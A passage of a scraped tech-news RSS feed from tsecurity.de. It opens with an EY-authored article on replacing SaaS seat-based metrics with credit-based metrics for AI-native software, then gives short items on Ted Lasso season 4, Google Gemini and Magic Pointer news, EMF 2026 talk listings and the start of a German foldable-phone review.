<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ted Lasso Season 4 Early Buzz Says New Episodes Bring Back Season 1 Magic]]></title>
<description><![CDATA[Ted Lasso season 4 is almost here, and early reports suggest fans have good reason to feel excited about the show's return. The new season premieres on August 5 with its first episode, followed by weekly releases through October 7, and people close to the production believe it delivers a stronger...]]></description>
<link>https://tsecurity.de/de/3687335/ios-mac-os/ted-lasso-season-4-early-buzz-says-new-episodes-bring-back-season-1-magic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687335/ios-mac-os/ted-lasso-season-4-early-buzz-says-new-episodes-bring-back-season-1-magic/</guid>
<pubDate>Wed, 22 Jul 2026 20:40:27 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ted Lasso season 4 is almost here, and early reports suggest fans have good reason to feel excited about the show's return. The new season premieres on August 5 with its first episode, followed by weekly releases through October 7, and people close to the production believe it delivers a stronger story than season 3 while bringing back the charm that made the series a global hit.



The Hollywood Reporter recently shared an in-depth look at how season 4 came together, revealing that Jason Sudeikis originally planned to end the series after three seasons before changing his mind. Instead of moving ahead with one of several spinoff ideas, including projects centered on Roy Kent and Keeley Jones, the creative team decided to continue the main story with a fresh direction.



Season 4 shifts its focus to AFC Richmond's women's team, which was teased during the season 3 finale. Jason Sudeikis returns as Ted Lasso, while Hannah Waddingham, Juno Temple, Brett Goldstein, and several familiar faces also reprise their roles. The team also welcomed sitcom veteran Jack Burditt, who joined as co-showrunner to help keep production on schedule while Sudeikis continued leading the creative side.



Although critics have not published reviews yet, people involved with the series have shared positive reactions behind the scenes. Brett Goldstein said the new season has some of the season 1 magic, and several others reportedly share the same opinion. Internal feedback also describes season 4 as considerably stronger than season 3, which received mixed reactions because of its longer episodes and production challenges.



Jason Sudeikis said he finally returned because he still had more stories to tell, and he believes Ted Lasso remains meaningful for both him and the audience. If season 4 performs well, the writers expect to begin planning a fifth season, with Sudeikis already thinking about another three-season story arc.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android & Gemini: Google muss fremde KI-Assistenten vollständig unterstützen – fordert die EU-Kommission]]></title>
<description><![CDATA[Google hat bereits damit begonnen, den KI-ChatBot Gemini in das Betriebssystem Android zu integrieren und will dies mit den kommenden Versionen vertiefen. Damit es nicht zur nächsten Dominanz kommt, schiebt die EU-Kommission schon jetzt einen kleinen Riegel vor und zwingt Google zur Öffnung der S...]]></description>
<link>https://tsecurity.de/de/3681177/it-nachrichten/android-gemini-google-muss-fremde-ki-assistenten-vollstaendig-unterstuetzen-fordert-die-eu-kommission/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681177/it-nachrichten/android-gemini-google-muss-fremde-ki-assistenten-vollstaendig-unterstuetzen-fordert-die-eu-kommission/</guid>
<pubDate>Mon, 20 Jul 2026 15:02:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="441" src="https://www.googlewatchblog.de/wp-content/uploads/android-bugdroid-logo-ki-intelligenz-1024x705.jpg" class="attachment-large size-large wp-post-image" alt="android bugdroid logo ki intelligenz" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/android-bugdroid-logo-ki-intelligenz-1024x705.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/android-bugdroid-logo-ki-intelligenz-300x207.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/android-bugdroid-logo-ki-intelligenz-768x529.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/android-bugdroid-logo-ki-intelligenz-581x400.jpg 581w, https://www.googlewatchblog.de/wp-content/uploads/android-bugdroid-logo-ki-intelligenz-800x551.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/android-bugdroid-logo-ki-intelligenz.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Google hat bereits damit begonnen, den KI-ChatBot <a href="https://www.googlewatchblog.de/2026/07/gemini-update-jul2026-drei/"><strong>Gemini</strong></a> in das Betriebssystem <a href="https://www.googlewatchblog.de/2026/07/android-ganz-neue-google-app-magic-pointer-startet-im-play-store-bringt-ki-funktionen-fuer-aluminium-os/"><strong>Android</strong></a> zu integrieren und will dies mit den kommenden Versionen vertiefen. Damit es nicht zur nächsten Dominanz kommt, schiebt die EU-Kommission schon jetzt einen kleinen Riegel vor und zwingt Google zur Öffnung der Schnittstellen. KI-Assistenten von Drittanbietern dürfen nicht benachteiligt werden.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/android-gemini-google-muss-fremde-ki-assistenten-vollstaendig-unterstuetzen-fordert-die-eu-kommission/">Android &amp; Gemini: Google muss fremde KI-Assistenten vollständig unterstützen – fordert die EU-Kommission</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/2fd16f67f07b45f585f9734de4bc3124"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/2fd16f67f07b45f585f9734de4bc3124" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/android-gemini-google-muss-fremde-ki-assistenten-vollstaendig-unterstuetzen-fordert-die-eu-kommission/">Android &amp; Gemini: Google muss fremde KI-Assistenten vollständig unterstützen – fordert die EU-Kommission</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Watching the world burn as all the money flows into a multitrillion-dollar Magic 8 Ball]]></title>
<description><![CDATA[On this week's episode of The Kettle, we welcome a special guest to discuss how the AI datacenter buildout is setting the world on fire – literally]]></description>
<link>https://tsecurity.de/de/3681165/it-nachrichten/watching-the-world-burn-as-all-the-money-flows-into-a-multitrillion-dollar-magic-8-ball/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681165/it-nachrichten/watching-the-world-burn-as-all-the-money-flows-into-a-multitrillion-dollar-magic-8-ball/</guid>
<pubDate>Mon, 20 Jul 2026 14:54:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[On this week's episode of The Kettle, we welcome a special guest to discuss how the AI datacenter buildout is setting the world on fire – literally]]></content:encoded>
</item>
<item>
<title><![CDATA[Awe and Wonder in the Sky (emf2026)]]></title>
<description><![CDATA[A story-driven talk about the hidden science of light and the sky, told through encounters including searching for glow worms and chasing comets. And a #RobotWars Easter egg. 

Starting in the air around us, we travel upwards into the sky and finally in to space. 

Between these two stories are t...]]></description>
<link>https://tsecurity.de/de/3679230/it-security-video/awe-and-wonder-in-the-sky-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679230/it-security-video/awe-and-wonder-in-the-sky-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 11:18:05 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A story-driven talk about the hidden science of light and the sky, told through encounters including searching for glow worms and chasing comets. And a #RobotWars Easter egg. 

Starting in the air around us, we travel upwards into the sky and finally in to space. 

Between these two stories are the bits of science we often walk under without noticing: why the sky changes colour, what darkness reveals, how light behaves, and how small observations can lead to much bigger questions.

Part travel story, part natural history, part engineering-minded curiosity, this 30-minute talk is an invitation to look up — and to notice more.

It's related to the speaker's new book &quot;Up - A Scientist's Guide to the Magic Above Us' which will be available to purchase on the day (and Lucy will signing books after the event).

The book is also available as an audio book and e-book. 

15th July - for one day only - the e-book will be 99p on Amazon.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/89-awe-and-wonder-in-the-sky]]></content:encoded>
</item>
<item>
<title><![CDATA[Android: Ganz neue Google-App ‚Magic Pointer‘ startet im Play Store – bringt KI-Funktionen für Aluminium OS]]></title>
<description><![CDATA[Google hat vor wenigen Tagen eine sehr interessante neue Android-App im Play Store veröffentlicht, die zukünftig noch eine große Rolle spielen wird: Mit dem Magic Pointer sollen die Nutzer ihren klassischen Mauszeiger mit ganz neuen KI-Funktionen ausstatten zu können - zuerst exklusiv auf den kom...]]></description>
<link>https://tsecurity.de/de/3679179/it-nachrichten/android-ganz-neue-google-app-magic-pointer-startet-im-play-store-bringt-ki-funktionen-fuer-aluminium-os/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679179/it-nachrichten/android-ganz-neue-google-app-magic-pointer-startet-im-play-store-bringt-ki-funktionen-fuer-aluminium-os/</guid>
<pubDate>Sun, 19 Jul 2026 10:47:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="359" src="https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-1024x575.jpg" class="attachment-large size-large wp-post-image" alt="googlebook magic cursor" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-1024x575.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-300x169.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-768x432.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-640x360.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-800x450.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Google hat vor wenigen Tagen eine sehr interessante neue Android-App im Play Store veröffentlicht, die zukünftig noch eine große Rolle spielen wird: Mit dem <a href="https://www.googlewatchblog.de/2026/07/android-neue-google-app-magic-pointer-zeigt-sich-ueberraschend-im-play-store-erste-app-fuer-googlebooks/"><strong>Magic Pointer</strong></a> sollen die Nutzer ihren klassischen Mauszeiger mit ganz neuen KI-Funktionen ausstatten zu können - zuerst exklusiv auf den kommenden Googlebooks. Wir zeigen euch die neue App im Detail, die nach erstem Leak wieder entfernt wurde.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/android-ganz-neue-google-app-magic-pointer-startet-im-play-store-bringt-ki-funktionen-fuer-aluminium-os/">Android: Ganz neue Google-App ‚Magic Pointer‘ startet im Play Store – bringt KI-Funktionen für Aluminium OS</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/101dc26df2704fb2be29cbec1fdd39bf"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/101dc26df2704fb2be29cbec1fdd39bf" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/android-ganz-neue-google-app-magic-pointer-startet-im-play-store-bringt-ki-funktionen-fuer-aluminium-os/">Android: Ganz neue Google-App ‚Magic Pointer‘ startet im Play Store – bringt KI-Funktionen für Aluminium OS</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[„Magic Pointer“: Google Gemini revolutioniert den Mauszeiger]]></title>
<description><![CDATA[Auswählen, markieren, klicken. Mehr konnte ein klassischer Mauszeiger auf Desktop-Systemen bislang eigentlich nicht, und das hat sich auch in den letzten Jahrzehnten nicht wirklich geändert.…
Dieser Artikel „Magic Pointer“: Google Gemini revolutioniert den Mauszeiger erschien zuerst auf SmartDroi...]]></description>
<link>https://tsecurity.de/de/3679055/android-tipps/magic-pointer-google-gemini-revolutioniert-den-mauszeiger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679055/android-tipps/magic-pointer-google-gemini-revolutioniert-den-mauszeiger/</guid>
<pubDate>Sun, 19 Jul 2026 09:25:46 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="2168" height="1156" src="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/Magic-Pointer-Googlebook-Hero.jpg?fit=2168%2C1156&amp;ssl=1" class="attachment-medium size-medium wp-post-image" alt="Magic Pointer Googlebook Hero" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/Magic-Pointer-Googlebook-Hero.jpg?w=2168&amp;ssl=1 2168w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/Magic-Pointer-Googlebook-Hero.jpg?resize=1600%2C853&amp;ssl=1 1600w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/Magic-Pointer-Googlebook-Hero.jpg?resize=1536%2C819&amp;ssl=1 1536w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/Magic-Pointer-Googlebook-Hero.jpg?resize=2048%2C1092&amp;ssl=1 2048w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/Magic-Pointer-Googlebook-Hero.jpg?w=1800&amp;ssl=1 1800w" sizes="(max-width: 2168px) 100vw, 2168px"><p>Auswählen, markieren, klicken. Mehr konnte ein klassischer Mauszeiger auf Desktop-Systemen bislang eigentlich nicht, und das hat sich auch in den letzten Jahrzehnten nicht wirklich geändert.…</p>
<p>Dieser Artikel <a rel="nofollow" href="https://www.smartdroid.de/magic-pointer-google-gemini-revolutioniert-den-mauszeiger/">„Magic Pointer“: Google Gemini revolutioniert den Mauszeiger</a> erschien zuerst auf <a rel="nofollow" href="https://www.smartdroid.de/">SmartDroid.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Film Is Not Dead: Live Developing on Stage (emf2026)]]></title>
<description><![CDATA[Watch as I develop a roll of black-and-white film live on stage, taking it from exposed film to visible negatives and scanned digital images in real time. The roll will contain photos shot around EMF earlier that day, with a volunteer taking the final frames live during the session.

A lot of peo...]]></description>
<link>https://tsecurity.de/de/3678688/it-security-video/film-is-not-dead-live-developing-on-stage-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678688/it-security-video/film-is-not-dead-live-developing-on-stage-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 03:02:59 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Watch as I develop a roll of black-and-white film live on stage, taking it from exposed film to visible negatives and scanned digital images in real time. The roll will contain photos shot around EMF earlier that day, with a volunteer taking the final frames live during the session.

A lot of people think photographic chemistry is effectively magic, but developing film is really just a sequence of straightforward steps, timings, and temperature control — much closer to following a recipe than performing an arcane art.

As the chemistry works, you’ll learn how black-and-white film development actually works, why it’s much easier and more accessible than most people assume, and how analogue photography connects surprisingly well with modern maker culture, including all the modern ways for scanning and sharing your film photos.

By the end of the talk, you’ll (hopefully!) see freshly developed negatives projected live on screen.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/78-film-is-not-dead-live-developing-on-stage]]></content:encoded>
</item>
<item>
<title><![CDATA[Film Is Not Dead: Live Developing on Stage (emf2026)]]></title>
<description><![CDATA[Watch as I develop a roll of black-and-white film live on stage, taking it from exposed film to visible negatives and scanned digital images in real time. The roll will contain photos shot around EMF earlier that day, with a volunteer taking the final frames live during the session.

A lot of peo...]]></description>
<link>https://tsecurity.de/de/3678672/it-security-video/film-is-not-dead-live-developing-on-stage-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678672/it-security-video/film-is-not-dead-live-developing-on-stage-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 02:33:11 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Watch as I develop a roll of black-and-white film live on stage, taking it from exposed film to visible negatives and scanned digital images in real time. The roll will contain photos shot around EMF earlier that day, with a volunteer taking the final frames live during the session.

A lot of people think photographic chemistry is effectively magic, but developing film is really just a sequence of straightforward steps, timings, and temperature control — much closer to following a recipe than performing an arcane art.

As the chemistry works, you’ll learn how black-and-white film development actually works, why it’s much easier and more accessible than most people assume, and how analogue photography connects surprisingly well with modern maker culture, including all the modern ways for scanning and sharing your film photos.

By the end of the talk, you’ll (hopefully!) see freshly developed negatives projected live on screen.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/78-film-is-not-dead-live-developing-on-stage]]></content:encoded>
</item>
<item>
<title><![CDATA[Behind the Curtain: Inside the Hidden Tech of Live Theatre and Events (emf2026)]]></title>
<description><![CDATA[What happens when the lights go out, the flames shoot up, and the performer flies over the audience? None of it is magic - it’s a remarkably deep stack of engineering, software, and controlled chaos, and almost none of it is visible to the audience.

 This talk pulls back the curtain on the techn...]]></description>
<link>https://tsecurity.de/de/3678201/it-security-video/behind-the-curtain-inside-the-hidden-tech-of-live-theatre-and-events-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678201/it-security-video/behind-the-curtain-inside-the-hidden-tech-of-live-theatre-and-events-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 17:33:07 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[What happens when the lights go out, the flames shoot up, and the performer flies over the audience? None of it is magic - it’s a remarkably deep stack of engineering, software, and controlled chaos, and almost none of it is visible to the audience.

 This talk pulls back the curtain on the technology powering professional theatre and live events - from West End productions to outdoor festivals. We’ll cover the full picture: how sACN and Art-Net carry hundreds of DMX universes from console to fixture; how show control systems tie lighting, audio, video, and automation together with sub-millisecond precision; how stage rigging and flying systems work (and what actually keeps performers safe in the air); how pyrotechnics are engineered for precise timing, reliable ignition, and zero-failure fault tolerance; and how modern video infrastructure - PTZ cameras, SDI, AV-over-IP - comes together live with no second takes. 

Along the way we’ll dig into the networking and software glue that holds it all together: AES67 audio-over-IP, timecode, OSC, MIDI show control, video-over-IP, and the eternal cursed nightmare of clock synchronisation. 

Whether you’ve wondered what’s actually in that rack at side of stage, or you want to understand how the world’s largest productions are really engineered, this talk is for you.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/53-behind-the-curtain-inside-the-hidden-tech-of-live-theatre]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten faltbaren Smartphones im Test]]></title>
<description><![CDATA[Thomas Deehan / Foundry



Klassische Smartphones mit starrem Gehäuse bleiben praktisch, doch Foldables spielen in vielen Situationen inzwischen in einer eigenen Liga. Sie bieten ein großes Display zum Aufklappen, passen aber weiterhin in die Tasche – ideal für Multitasking, produktives Arbeiten,...]]></description>
<link>https://tsecurity.de/de/3677422/it-security-nachrichten/die-besten-faltbaren-smartphones-im-test/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677422/it-security-nachrichten/die-besten-faltbaren-smartphones-im-test/</guid>
<pubDate>Sat, 18 Jul 2026 06:07:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.50.59.png?w=1024" alt="Die besten faltbaren Smartphones" class="wp-image-4197805" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<p class="wp-block-paragraph">Klassische Smartphones mit starrem Gehäuse bleiben praktisch, doch Foldables spielen in vielen Situationen inzwischen in einer eigenen Liga. Sie bieten ein großes Display zum Aufklappen, passen aber weiterhin in die Tasche – ideal für Multitasking, produktives Arbeiten, Videos, Gaming oder besonders flexible Kamera-Perspektiven.</p>



